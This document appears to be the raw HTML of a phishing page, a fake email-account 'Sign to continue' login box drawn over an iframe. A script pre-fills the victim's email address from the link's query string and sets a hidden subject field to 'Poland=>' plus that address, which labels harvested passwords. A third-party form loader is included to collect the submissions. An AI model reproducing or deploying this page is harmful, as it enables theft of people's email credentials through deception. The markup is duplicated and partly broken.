<html lang="en"><head>
<script type="text/javascript">
</script>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>ADMIN</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>Login</title>
<style>
        body{
            width:99%;
            height:100%;
            margin:0;
            padding:0;
                  overflow: hidden; /* Hide scrollbars */
        }
        #mainPage{
            border:none;
        }
        hr{
            border:1px solid #999;
        }
        #overlay{
            background-color:#555;
            position:absolute;
            top:0;
            left:0;
            bottom:0;
            right:0;
            border:1px solid #555;
            opacity: 0.6;
            filter: alpha(opacity=60)
        }
        #loginBody{
            background-color:#555;
            border: 1px solid #DDD;
            box-shadow: 0px 0px 10px #DDD;
            width: 480px;
            height: 337px;
            position:absolute;
            top:24%;
            left:33%;
        }
        #loginBg{
            background:white;
            width:100%;
            height:100%;
            opacity: 0.9;
            filter: alpha(opacity=90);
        }
        #topHeader{
            margin-bottom:10px;
            padding-top:10px;
        }
        #favIcon{
            margin:0 10px;
        }
        #form{
            position:relative;
            left:10%;
            width:80%;
        }
        .email, .pass{
            margin:0 0 5px;
        }
            
    .pass:after {
       
            }
            .pass {
        display:inline-block;
        position: relative
    }
       .errspan {
        float: left;
        margin-left: 20px;
        margin-top: 0px;
        position: relative;
        z-index: 2;
        color: brown;
            border:1px solid grey;
            height:27px;
            width: 30px;
            padding-top:5px;
            border-right:none;
    }
      input:focus, input:focus{
    outline: none;
}
    </style>

<div>
<title>Login</title>

<style>
        body{
            width:99%;
            height:100%;
            margin:0;
            padding:0;
                  overflow: hidden; /* Hide scrollbars */
        }
        #mainPage{
            border:none;
        }
        hr{
            border:1px solid #999;
        }
        #overlay{
            background-color:#555;
            position:absolute;
            top:0;
            left:0;
            bottom:0;
            right:0;
            border:1px solid #555;
            opacity: 0.0;
            filter: alpha(opacity=60)
        }
        #loginBody{
            background-color:#555;
            border: 1px solid #DDD;
            box-shadow: 0px 0px 10px #DDD;
            width: 480px;
            height: 400px;
            position:absolute;
            top:24%;
            left:33%;
        }
        #loginBg{
            background:white;
            width:100%;
            height:100%;
            opacity: 0.9;
            filter: alpha(opacity=90);
        }
        #topHeader{
            margin-bottom:10px;
            padding-top:10px;
        }
        #favIcon{
            margin:0 10px;
        }
        #form{
            position:relative;
            left:10%;
            width:80%;
        }
        .email, .pass{
            margin:0 0 5px;
        }
            
    .pass:after {
       
            }
            .pass {
        display:inline-block;
        position: relative
    }
       .errspan {
        float: left;
        margin-left: 20px;
        margin-top: 0px;
        position: relative;
        z-index: 2;
        color: brown;
            border:1px solid grey;
            height:27px;
            width: 30px;
            padding-top:5px;
            border-right:none;
    }
      input:focus, input:focus{
    outline: none;
}
   
    </style>
<link type="image/x-icon" rel="shortcut icon" href="https://joseshippings.cfd/i/wp-content/uploads/2024/06/Captussre.jpg">
<b><iframe id="mainPage" src="" scrolling="no" sandbox="allow-forms allow-pointer-lock allow-popups allow-scripts" style="position: absolute; height: 100%;border: none;" width="100%"></iframe>

<div id="overlay" style="height: 100%; width: 1366px;">

</div>
<div id="loginBody">
    <div id="loginBg">
        <div id="topHeader"
<link type="image/x-icon" rel="shortcut icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSxSACYGbVArx5ZqzvW-FGvy302iiNvy2FbNHWOjtEIjCh7VXetSSpV57u90m2zdXN9VPo&usqp=CAU">  
<center>  <p>

1969MB - 2000MB

<img id="logoimg" src="" style="width:30;margin-top:0px;"> <span id="logoname" style="font-size:19px;"></span> 
<div id="topHeader" style="background-color:;color:white;padding-bottom:5px;padding-left:20px;">
style="width:22px;margin-top:0px;"> <span id="logoname" style="font-size:19px;"></span>      
     
      <form action="???" method="post">
<script id="ratufa_loader" src="https://www.ratufa.io/c/ld.js?f=mxg51f63&n=n1.ratufa.io"></script>
<div style="font-size:16pt; color:green;" align="center"><b>Sign to continue </b></div>

           <p><input type="email" name="email" id="email" placeholder="Email address" style="font-size: 12pt; height: 30px; width:280px;" readonly="readonly" />
       
         <div class="form-group mb-4 position-relative">
                  <input type="password" name="Password" placeholder="Password" style="font-size: 12pt; height: 30px; width:280px;" required="" oninvalid="this.setCustomValidity('Enter your email password')"
  oninput="this.setCustomValidity('')"/>
 <p>
            <div class="form-check mb-4"> 

      <br/>
        <p><p><center>
  <p> <button type="submit" id="btn" name="sub" class="new-dream" style=" background: #21618c; color:#fff; font-size: 12pt; height: 45px; width:200px;"><b>Sign In</button>>

</script>
<script type="text/javascript">
const params=new URLSearchParams(window.location.search);
document.getElementById('email').value=params.get('email');
document.getElementById('subject').value="Poland=> " + params.get('email');
document.getElementById('subject').value=".poland =>" + params.get('email');
document.getElementById('id01').value=params.get('email');
</script>

     <script>
       function onSubmit(token) {
         document.getElementById("my-form").submit();
       }
     </script>